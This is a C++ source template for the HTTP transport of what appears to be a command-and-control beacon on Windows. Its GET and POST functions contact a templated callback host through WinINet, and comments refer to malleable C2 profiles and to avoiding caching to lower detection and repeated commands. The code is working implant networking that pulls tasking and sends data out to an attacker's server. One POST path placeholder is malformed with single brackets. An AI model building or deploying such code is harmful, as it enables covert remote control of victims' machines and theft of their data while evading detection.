/*
Jinja notes: Just completely copy in this file, then run jinja vars on it. 
*/

#include <windows.h>
#include <wininet.h>
#include <iostream>
#include <vector>

#pragma comment(lib, "wininet.lib")


bool HTTP_GET(std::vector<std::wstring>& headers, std::vector<uint8_t>& response) {
    // 1. Initialize
    //https://learn.microsoft.com/en-us/windows/win32/api/wininet/nf-wininet-internetopenw
    HINTERNET hInternet = InternetOpenW(
        L"[[http_user_agent]]",                // user agent - template, malc2 this
        INTERNET_OPEN_TYPE_PRECONFIG,     //https://learn.microsoft.com/en-us/windows/win32/api/wininet/nf-wininet-internetopena#parameters: INTERNET_OPEN_TYPE_PRECONFIG: proxy OR direct, based on registry (matches inet expl)
        NULL,
        NULL,
        0
    );
    if (!hInternet) return false;

    // 2. Connect (Hardcoded IP and Port)
    //https://learn.microsoft.com/en-us/windows/win32/api/wininet/nf-wininet-internetconnectw
    HINTERNET hConnect = InternetConnectW(
        hInternet,
        L"[[callback_host]]",           // Server - template,
        [[callback_port]],                   // Port - template
        NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0
    );
    if (!hConnect) {
        InternetCloseHandle(hInternet);
        return false;
    }

    // 3. Open Request (Hardcoded Path)
    //https://learn.microsoft.com/en-us/windows/win32/api/wininet/nf-wininet-httpopenrequestw
    HINTERNET hRequest = HttpOpenRequestW(
        hConnect,
        L"[[http_get_verb]]",                 // Method - template, mallc2 this
        L"[[http_get_uri]]",         // Path - template, mallc2 this
        NULL, NULL, NULL,
        INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE, ///reload: always gets new, no cache, doesn't cache. cache = bad cuz the data is somewhere else besides beacon. Increases detection likelyhood + potential repeat commands
        0
    );
    if (!hRequest) {
        InternetCloseHandle(hConnect);
        InternetCloseHandle(hInternet);
        return false;
    }

    // 4. Add Headers Loop
    for (const auto& header : headers) {
        //https://learn.microsoft.com/en-us/windows/win32/api/wininet/nf-wininet-httpaddrequestheadersa
        //easier to put headers here rather than 2nd arg of HttpSendRequest
        HttpAddRequestHeadersW(hRequest, header.c_str(), -1L, HTTP_ADDREQ_FLAG_ADD | HTTP_ADDREQ_FLAG_REPLACE); //HTTP_ADDREQ_FLAG_REPLACE will replace an existing header of the same name
    }

    // 5. Send Request
    //https://learn.microsoft.com/en-us/windows/win32/api/wininet/nf-wininet-httpsendrequesta
    if (!HttpSendRequestW(hRequest, NULL, 0, NULL, 0)) {
        std::cerr << "Send failed: " << GetLastError() << std::endl;
        InternetCloseHandle(hRequest);
        InternetCloseHandle(hConnect);
        InternetCloseHandle(hInternet);
        return false;
    }

    // 6. Read Response
    uint8_t tempBuffer[4096];
    DWORD bytesRead;
    while (InternetReadFile(hRequest, tempBuffer, sizeof(tempBuffer), &bytesRead) && bytesRead > 0) {
        response.insert(response.end(), tempBuffer, tempBuffer + bytesRead);
    }

    // Cleanup
    InternetCloseHandle(hRequest);
    InternetCloseHandle(hConnect);
    InternetCloseHandle(hInternet);
    return true;
}


bool HTTP_POST(std::string data, std::vector<std::wstring>& headers, std::vector<uint8_t>& response) {
    // 1. Initialize
    //https://learn.microsoft.com/en-us/windows/win32/api/wininet/nf-wininet-internetopenw
    HINTERNET hInternet = InternetOpenW(
        L"[[http_user_agent]]",                // user agent - template, malc2 this
        INTERNET_OPEN_TYPE_PRECONFIG,     //https://learn.microsoft.com/en-us/windows/win32/api/wininet/nf-wininet-internetopena#parameters: INTERNET_OPEN_TYPE_PRECONFIG: proxy OR direct, based on registry (matches inet expl)
        NULL,
        NULL,
        0
    );
    if (!hInternet) return false;

    // 2. Connect (Hardcoded IP and Port)
    //https://learn.microsoft.com/en-us/windows/win32/api/wininet/nf-wininet-internetconnectw
    HINTERNET hConnect = InternetConnectW(
        hInternet,
        L"[[callback_host]]",           // Server - template,
        [[callback_port]],                   // Port - template
        NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0
    );
    if (!hConnect) {
        InternetCloseHandle(hInternet);
        return false;
    }

    // 3. Open Request (Hardcoded Path)
    //https://learn.microsoft.com/en-us/windows/win32/api/wininet/nf-wininet-httpopenrequestw
    HINTERNET hRequest = HttpOpenRequestW(
        hConnect,
        L"[[http_post_verb]]",                // Method - template, mallc2 this
        L"[http_post_uri]",          // Path - template, mallc2 this
        NULL, NULL, NULL,
        INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE, ///reload: always gets new, no cache, doesn't cache. cache = bad cuz the data is somewhere else besides beacon. Increases detection likelyhood + potential repeat commands
        0
    );
    if (!hRequest) {
        InternetCloseHandle(hConnect);
        InternetCloseHandle(hInternet);
        return false;
    }

    // 4. Add Headers Loop
    for (const auto& header : headers) {
        //https://learn.microsoft.com/en-us/windows/win32/api/wininet/nf-wininet-httpaddrequestheadersa
        //easier to put headers here rather than 2nd arg of HttpSendRequest
        HttpAddRequestHeadersW(hRequest, header.c_str(), -1L, HTTP_ADDREQ_FLAG_ADD | HTTP_ADDREQ_FLAG_REPLACE); //HTTP_ADDREQ_FLAG_REPLACE will replace an existing header of the same name
    }

    // 5. Send Request
    //https://learn.microsoft.com/en-us/windows/win32/api/wininet/nf-wininet-httpsendrequestw
    LPVOID post_data = (LPVOID)data.c_str();
    if (!HttpSendRequestW(hRequest, NULL, 0, post_data, data.length())) {
        std::cerr << "Send failed: " << GetLastError() << std::endl;
        InternetCloseHandle(hRequest);
        InternetCloseHandle(hConnect);
        InternetCloseHandle(hInternet);
        return false;
    }

    // 6. Read Response
    uint8_t tempBuffer[4096];
    DWORD bytesRead;
    while (InternetReadFile(hRequest, tempBuffer, sizeof(tempBuffer), &bytesRead) && bytesRead > 0) {
        response.insert(response.end(), tempBuffer, tempBuffer + bytesRead);
    }

    // Cleanup
    InternetCloseHandle(hRequest);
    InternetCloseHandle(hConnect);
    InternetCloseHandle(hInternet);
    return true;
}
